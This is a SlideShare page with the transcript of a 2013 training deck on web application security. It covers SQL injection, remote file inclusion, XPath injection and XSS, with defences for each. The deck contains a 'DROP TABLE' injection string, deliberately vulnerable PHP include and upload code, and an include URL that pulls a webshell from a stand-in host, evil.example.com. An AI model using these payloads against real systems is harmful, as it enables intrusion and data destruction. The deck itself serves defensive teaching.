Web Application Security

  • 1,381 views
Uploaded on

Describing the reasons and history for web applications, as well as common injections and how to avoid them. …

Describing the reasons and history for web applications, as well as common injections and how to avoid them.

More in: Technology
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Be the first to comment
    Be the first to like this
No Downloads

Views

Total Views
1,381
On Slideshare
0
From Embeds
0
Number of Embeds
0

Actions

Shares
Downloads
21
Comments
0
Likes
0

Embeds 0

No embeds

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
    No notes for slide

Transcript

  • 1. Web ApplicationSecuritySlides by: Ynon Perekynon@ynonperek.comhttp://ynonperek.comMonday, April 29, 13
  • 2. Agendan Intro to Web Securityn Web Application Architecturen Code Injectionsn Request Forgeriesn Losing TrustMonday, April 29, 13
  • 3. Reasons for SecurityMonday, April 29, 13
  • 4. Reasons for Securityn Reliable systems are securen Security of a system = Security of the weakest partn Hard to fix after system is readyn Everyone should careMonday, April 29, 13
  • 5. How It All Startedn John Draper (Cap’nCrunch)n phreaking in the 70sMonday, April 29, 13
  • 6. How It All Startedn 1986 Brainn 1988 Morrisn Both (meant as) harmlessn Lead to CERTMonday, April 29, 13
  • 7. How It All Startedn 90s gave birth to phishingattacksn AOL being the first victimMonday, April 29, 13
  • 8. How It All Startedn Security became an issuen 2003 Summer of wormsn Blaster, Nachi, SoBigMonday, April 29, 13
  • 9. IT Security TodayNPR.org Hacked; Syrian ElectronicArmy Takes ResponsibilityApril 16,Monday, April 29, 13
  • 10. IT Security TodayMonday, April 29, 13
  • 11. IT Security TodayMonday, April 29, 13
  • 12. IT Security Today‫מטוס‬ ‫להפיל‬ ‫כדי‬ ‫שצריך‬ ‫מה‬ ‫כל‬ ,‫פחד‬ ‫איזה‬‫אנדרואיד‬ ‫זה‬.‫אחת‬ ‫תגובה‬ .10:04 ,2013 ‫באפריל‬ 12 ‫רז‬ ‫זהבי‬ ‫נועה‬ ‫מאת‬‫סלולר‬ ,‫מידע‬ ‫אבטחת‬ ‫לקטגוריות‬ ‫שייך‬‫אבטחה‬ ‫פריצת‬ ‫ישנה‬ ‫הפיקוח‬ ‫מגדלי‬ ‫בתוכנות‬ ‫כי‬ ‫גילה‬ ‫האקר‬.‫ההודעה‬ ‫את‬ ‫לו‬ ‫שולח‬ ‫באמת‬ ‫מי‬ ‫לדעת‬ ‫יכול‬ ‫לא‬ ‫הטייס‬ – ‫חמורה‬‫ואף‬ ‫מטוס‬ ‫על‬ ‫להשתלט‬ ‫ניתן‬ ‫שפיתח‬ ‫אפליקצייה‬ ‫באמצעות‬‫לרסקו‬Monday, April 29, 13
  • 13. Why Is It Hard ?n Secure code problems:n Lack of knowledgen CarelessnessMonday, April 29, 13
  • 14. Secure From The Startn Fixing security errors after coding is expensiven Writing secure code is easyMonday, April 29, 13
  • 15. Q & AMonday, April 29, 13
  • 16. Web ApplicationsMonday, April 29, 13
  • 17. Web ArchitectureClient ServerGET DataSend ResponseMonday, April 29, 13
  • 18. Server Siden Creates data and sendsback to clientn Data can be: HTML,JSON, XML, Images andmoren Choose your flavorMonday, April 29, 13
  • 19. Server Side Flawsn Code injectionsn Information leakMonday, April 29, 13
  • 20. Client Siden Web browser takes dataand renders on screenn Browsers: IE, Firefox,Chrome, Safarin Languages: JavaScript,ActionScript, Java(Applets)Monday, April 29, 13
  • 21. Client Side Flawsn Code injectionsn Information leakMonday, April 29, 13
  • 22. Web Weaknessn Client-Server gap is too easyn HTTP is state-lessn Many different technologies and vendorsn Code/Data intermixn It’s way more complicated than it looksMonday, April 29, 13
  • 23. Code Injectionsn Query Injections (SQL, XPath, LDAP)n Remote File Inclusionn JavaScript Injections ( XSS, CSRF )Monday, April 29, 13
  • 24. SQL Injectionsn Started in 1999n (Probably) the most famous techniquen 83% of data breaches 2005-2011n attack rate: 70 attempts / hourMonday, April 29, 13
  • 25. Famous Victimsn (2002) guess.com revealed 200K customer namesand credit cardsn (2007) Microsoft UK Defacementn (2009) RockYou DB hacked for 30Mil usersn (2011) MySql.com hackedn (2012) Yahoo lost 450K login credentialsMonday, April 29, 13
  • 26. SQL InjectionsMonday, April 29, 13
  • 27. What Did Bobby Break$query = "SELECT name, grade " +              "FROM students " +              "WHERE name = $user"Monday, April 29, 13
  • 28. What Did Bobby Break$query = "SELECT name, grade " +         "FROM students " +         "WHERE name =  Robert; DROP TABLE students"Expected datagot codeMonday, April 29, 13
  • 29. SQLi Examplesn See if you can log inn Login form code:https://github.com/ynonp/web-security-demos/blob/master/lib/WebSecurity/Demos/Controller/SQLInjection/Login.pmMonday, April 29, 13
  • 30. SQLi Examplen See if you can print out names and passwordsn https://github.com/ynonp/web-security-demos/blob/master/lib/WebSecurity/Demos/Controller/SQLInjection/InfoLeak.pmMonday, April 29, 13
  • 31. Affected Languagesn All programming languagesn Usually found in ASP, Java, Perl and PHPMonday, April 29, 13
  • 32. Bug Spottingn Search for code that:n Takes user inputn Does not validate inputn Uses input to talk to DBMonday, April 29, 13
  • 33. Bug Spottingn In code reviewn Find DB coden Make sure its input is sanitizedMonday, April 29, 13
  • 34. Black-Box Spottingn Many automated tools willhelp you find SQLInejctionsn Popular: Havijhttp://www.itsecteam.com/products/havij-v116-advanced-sql-injection/Monday, April 29, 13
  • 35. How To Avoidn Use prepared statementsn Demo:SELECT name, grade FROM studentsWHERE name=?? are later boundto dataMonday, April 29, 13
  • 36. How To Avoidn Sanitize your input. Alwaysn Demo:if ( ! $name =~ /^[a-z]+$/ ) {  die "Invalid Input";} if ( ! $age =~ /^[0-9]+$/ ) {  die "Invalid Input";}Monday, April 29, 13
  • 37. Extra Precautionsn Keep users passwords hashed in the DBn Encrypt important data in DBn Microsoft URLScann TrustWave ModSecurity (Open Source)Monday, April 29, 13
  • 38. Q & ASQL InjectionsMonday, April 29, 13
  • 39. Remote File Inclusionn Users upload filesn Some files are dangerousn ORn Server loads files based on user inputMonday, April 29, 13
  • 40. The Risk<?phpif (isset( $_GET[COLOR] ) ){include( $_GET[COLOR] . .php );}?>With/vulnerable.php?COLOR=http://evil.example.com/webshell.txtMonday, April 29, 13
  • 41. Local File Inclusionn Other bugs allow attacker to upload a PHP file toyour servern Usually missing upload file name testsMonday, April 29, 13
  • 42. Demo: imgurMonday, April 29, 13
  • 43. The RiskServerSave editor.phpupload.phpuploads/editor.phpMonday, April 29, 13
  • 44. Remote File Demoif ($_POST[url]) {        $uploaddir = $_POST[url];} $first_filename = $_FILES[uploadfile][name];$filename = md5($first_filename);$ext = substr($first_filename, 1 + strrpos($first_filename, .));$file = $uploaddir . basename($filename . . . $ext); if (move_uploaded_file($_FILES[uploadfile][tmp_name], $file)) {        echo basename($filename . . . $ext);} else {        echo error;}Monday, April 29, 13
  • 45. Example: OpenBBPHP remote file inclusion vulnerability in OpenBulletin Board (OpenBB) 1.0.8 and earlier allowsremote attackers to execute arbitrary PHP codevia a URL in the root_path parameter to (1)index.php and possibly (2) collector.php.CVE-2006-4722Monday, April 29, 13
  • 46. Bug Spottingn Search for code that loads external filesn Search for code that stores external filesn Make sure file name is sanitizedMonday, April 29, 13
  • 47. How To Avoidn Avoid by sanitizing your inputn Don’t allow uploads if you don’t have toMonday, April 29, 13
  • 48. Other Injectionsn XPath Injectionn LDAP InjectionMonday, April 29, 13
  • 49. Demon Try to find a company’s id using:https://github.com/ynonp/web-security-demos/blob/master/lib/WebSecurity/Demos/Controller/XPathInjection/Leak.pmMonday, April 29, 13
  • 50. Client-Side Injectionsn A relatively new category of injections uses ClientSide languages (mainly JavaScript)n Attacker uses website to attack other usersMonday, April 29, 13
  • 51. JavaScript InjectionsEvil HackerHonest UserWebApplication(Email)Send message tohonest userMessage includesevil JS codeMonday, April 29, 13
  • 52. JavaScript Securityn Browsers use a security policy called“Same Origin Policy”n A page has an originn Some actions are restricted to the page’s originMonday, April 29, 13
  • 53. JavaScript Risksn Same Origin Policy protects the following:n Unauthorized access to cookiesn Unauthorized access to canvasn Unauthorized AJAX callsMonday, April 29, 13
  • 54. Famous Injectionsn XSS is the most famous JavaScript injectionn Variants: Inject code to flashMonday, April 29, 13
  • 55. Famous InjectionsMonday, April 29, 13
  • 56. Famous InjectionsTwitter, Sep 2010Monday, April 29, 13
  • 57. Famous InjectionsYahoo, Jan 2013Monday, April 29, 13
  • 58. Famous Injectionsn “Sammy Is My Hero”n (2005) Sammy’s worm infected a Million accountsin less than 20 hoursMonday, April 29, 13
  • 59. Famous InjectionsMonday, April 29, 13
  • 60. Examplesn Throwing users out of a public chat roomn Getting a user to send a “fake” messagehttps://github.com/ynonp/web-security-demos/blob/master/lib/WebSecurity/Demos/Controller/JSInjection/Chatter.pmMonday, April 29, 13
  • 61. Examplesn Hijacking a user’s session through messagingn Getting a user to send a fake messagehttps://github.com/ynonp/web-security-demos/blob/master/lib/WebSecurity/Demos/Controller/XSS/SessionHijack.pmMonday, April 29, 13
  • 62. Bug Spottingn Search for code that writes markup to usern Verify all output is sanitizedMonday, April 29, 13
  • 63. Bug Spottingn http://xsser.sourceforge.net/n Python script that detectsXSS bugs in sitesMonday, April 29, 13
  • 64. Avoiding The Bugn Use the frameworkn Sanitize your outputn Consider other usersMonday, April 29, 13
  • 65. Q & AClient-Side InjectionsMonday, April 29, 13
  • 66. Code Weak Spotsn Injections are more likelyto occur in:n Cookiesn HTTP Headersn Don’t forget to sanitizethese tooMonday, April 29, 13
  • 67. Web Securityn Security of a system = the weakest partn System breaches usually involve more than onevulnerabilityn Use the power of frameworksMonday, April 29, 13
  • 68. Thanks For Listeningn Ynon Perekn http://ynonperek.comn ynon@ynonperek.comMonday, April 29, 13